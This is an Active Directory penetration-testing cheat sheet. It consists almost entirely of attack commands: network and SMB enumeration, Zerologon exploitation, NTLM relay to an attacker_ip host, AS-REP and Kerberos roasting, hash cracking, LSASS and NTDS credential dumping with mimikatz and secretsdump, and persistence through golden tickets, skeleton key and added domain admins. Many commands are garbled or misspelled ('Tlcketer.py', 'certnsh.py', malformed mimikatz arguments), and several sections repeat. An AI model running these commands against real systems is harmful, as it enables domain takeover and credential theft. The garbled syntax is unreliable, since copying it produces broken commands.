

Pentesting active directory

Scan Network

```
cme smb <ip> <range> # enumerate smb hosts
nmap -sP -p <ip> # ping scan
nmap -PN -sV --top-ports 50 --open <ip> # quick scan
nmap -PN --script smb-vuln -p139,445 <ip> # search smb vuln
nmap -PN -sC -sV <ip> # classic scan
nmap -PN -sC -sV -p <ip> # full scan
nmap -sU -sC -sV <ip> # udp scan
```

find AD IP

```
nmcli dev show eth0 # show domain name & dns
nslookup -type=SRV _ldap._tcp.dc._msdcs // DOMAIN/
```

zone transfert

```
dig axfr <domain_name> @<name_server>
```

List guest access on smb share

```
enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
smbmap -u "" -p "" -p 445 -H <dc-ip> && smbmap -u "guest" -p "" -p 445 -H <dc-ip>
smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
cme smb <ip> -u "" -p "" # enumerate null session
cme smb <ip> -u 'a' -p 'a' # enumerate anonymous access
```

Enumerate ldap

```
nmap -n -sV --script 'ldap' and not brute -p 389 <dc-ip>
ldapsearch -x -h <ip> -s base
```

Find user list

```
enum4linux -U <dc-ip> | grep 'user:'
crackmapexec smb <ip> -u <user> -p <password> --users
OSINT - enumerate username on internet
```

relay/poisoning

```
find smb not signed
PetitPotam.py -d <domain> -l <listener_ip> -c <target_ip>
responder -i eth0
mitm6 -d <domain>
python3 cve-2020-1472-exploit.py -MACHINE_BIOS_NAME <ip>
secretsdump.py <DOMAIN> -MACHINE_BIOS_NAME <ip> -no-pass -just-dc-user -Administrator
secretsdump.py -hashes -HASH_AdmIn -c <DOMAIN> -Administrator@<ip>
python3 restorepassword.py -target-ip <ip> -c <DOMAIN> -MACHINE_BIOS_NAME <ip> -MACHINE_BIOS_NAME -hexpass <HEXPA55>
```

zerologon

```
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```

classic quick compromise methods

```
java rmi
exploit/windows/smb/ms17_010_eternalblue
tomcat/boss manager
auxiliary/scanner/http/tomcat_enum
exploit/multi/http/tomcat_mgr_deploy
java serialized port
ysoserial
vulnerable product with cve
searchsploit
use scanner/smb/smb_enum_gpp
findstr /S /I cpassword \\<FQDN>\sysvol<FQDN>\policies\*.xml
database credentials
use admin/mssql/mssql_enum_sql_logins
proxylogon
proxysploit
```

Got valid username

```
Get password policy
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linux -u 'username' -p 'password' -P <IP>
Password spray
cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce # test user=password
cme smb <dc-ip> -u user.txt -p password.txt # multiple test (careful of lock policy)
python GetNPUsers.py <domain> -usersfile <usernames.txt> -format hashcat -outfile <hashes.domain.txt>
Get hash
Rubeus asreproast /format:hashcat
ASREPRoast
Get ASREPRoastable users
Get-DomainUser -PreauthNotRequired -Properties SamAccountName
MATCH (u:User (dontreapreauth:true)), (c:Computer), p=shortestPath((u)-[1..*]->(c)) RETURN p
```

cracking hash

```
LM
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
NTLM
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
NTLmV1
john --format=ntlmv1 hash.txt
hashcat -m 5500 -a 3 hash.txt
NTLmV2
john --format=ntlmv2 hash.txt
hashcat -m 5600 -a 0 hash.txt rockyou.txt
Kerberos 5 TGS
john spn.txt --format=krb5tgs --wordlist=rockyou.txt
hashcat -m 13100 -a 0 spn.txt rockyou.txt
no smb signing || ipv6 enabled || <dc> asreproast
hashcat -m 18200 -a 0 AS-REP-roast-hashes rockyou.txt
use exploit/windows/smb/smb_relay # windows200 / windows server2008
responder -l eth0 # disable smb & http
ntlmrelay.py -H targets.txt
ntlmrelay.py -s -h attacker_ip -l /tmp -socks -debug
ntlmrelay.py -s -h attacker_ip -l smb://<targets> -l /tmp -socks -debug
ntlmrelay.py -t <ldaps> //<dc> -h attacker_ip --delegate-access
ntlmrelay.py -t http://<dc> -h attacker_ip
certnsh.py -debug -smb2support --adcs --template DomainController
Rubeus.exe asktgt /user: <user> /certificate: <base64-certificate> /ptt
```

find hash

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```

relay

```
ntlmrelay.py -t http://<dc> -h attacker_ip
certnsh.py -debug -smb2support --adcs --template DomainController
Rubeus.exe asktgt /user: <user> /certificate: <base64-certificate> /ptt
```

adcs

```
ntlmrelay.py -t http://<dc> -h attacker_ip
certnsh.py -debug -smb2support --adcs --template DomainController
Rubeus.exe asktgt /user: <user> /certificate: <base64-certificate> /ptt
```

Privilege escalation

```
winpeas.exe
search password files
findstr /si 'password' *.txt *.xml *.docx
Juicy Potato / Lovely Potato
PrintSpoofer
RoguePotato
SMBGhost CVE-2020-0796
CVE-2021-34934 (HiveNightmare/ SeriousSAM)
...
```

Low access

```
search password files
findstr /si 'password' *.txt *.xml *.docx
SMBGhost CVE-2020-0796
CVE-2021-34934 (HiveNightmare/ SeriousSAM)
...
```

Administrator access

```
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "privilege:debug" "token:elevate" "sekurlsa:logonpasswords" "lsadump:sam" "exit"
post/windows/gather/smart_hashdump
hashdump
cme smb <ip> -u <user> -p <password> -M lsassy
cme smb <ip> -u <user> -p <password> -p <password> --lsa / --lsa / --nids
PPLDump64.exe <class.exe> lsass.pid -lsass.dmp
mimikatz "privilege:debug" "process:lsass.exe /remove" "privilege:debug" "token:elevate" "sekurlsa:logonpasswords" "processprotect /process lsass.exe" "h" "with mimidriver.sys"
```

Got credentials

```
enumerate SMB share
cme smb <ip> -u <user> -p <password> --shares
bloodhound
bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
powercat / powercat
GetUserSPNs.py -request <dc-ip> <dc-ip> <domain> / <user> <password>
Get hash
Rubeus kerberoast
Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
MATCH (u:User (haspn:true)) RETURN u
MATCH (u:User (haspn:true)), (c:Computer), p=shortestPath((u)-[1..*]->(c)) RETURN p
rcpclient <S> lookupsnames <name>
wmic useraccount get name,sid
auxiliary/admin/kerberos/ms14_068_kerberos_checksum
goldenPac.py -dc-ip <dc-ip> <domain> / <user> <password> @<target>
kerberos:ptc <'tickets'>
dncmd.exe /config /serverlevelpluginid <id> path\to\id -f # need a dnsadmin user
sc \<DNSServer> start dns
PrintNightmare
dnstool.py -u 'DOMAIN\User' -p 'password' --record "" --action query <dc-ip>
```

Got one account on the domain

```
Get all users
GetADUsers.py -all <dc-ip> <domain> / <username>
enumerate SMB share
cme smb <ip> -u <user> -p <password> --shares
bloodhound
bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
powercat / powercat
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```

Domain admin

```
crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> --ntds
secretsdump.py <domain> / <user> <pass> @<ip>
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
secretsdump.py -ntds ntds file.dit -system SYSTEM_FILE -hashes lmhash\ntds LOCAL -outfile ntlm-extract
windows/gather/credentials/domain_hashdump
```

Persistence

```
net group 'domain admins' 'myuser' /add /domain
Golden ticket
Tlcketer.py -nt hash <nt hash> -domain-sid <domain-sid> -domain <domain> -user <user>
Silver Ticket
PowerShell New-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DsrAdminLogonBehavior' -Value 2 -PropertyType DWORD
DSRM
mimikatz "privilege:debug" "misc:skeleton" "exit"
Skeleton Key
mimikatz "privilege:debug" "misc:memssp" "exit"
Custom SSP
C:\Windows\System32\kwissp.log
```

Trust relationship

```
Child Domain to Forest Compromise - SID Hijacking
Get-NetGroup -Domain <domain> -GroupName 'Enterprise Admins' -FullData select objectid
mimikatz lsadump:trust
kerberos:golden /user:Administrator /krbtgt <HASH_KRBTGT> /domain:<domain> /sid-cuser, /sid: <RootDomainSID-SID> /ptt
Forest to Forest Compromise - Trust Ticket
lsadump:trust /patch "lsadump:lsa /patch"
kerberos:golden /user:Administrator /domain:<domain> /sid: <sid> /sid: <RootDomainSID-SID> /ptt
Breaking forest trust
printerbug or petitpotam to force the DC of the external forest to connect on a local unconstrained delegation machine. Capture TGT, inject into memory and dcsync
```

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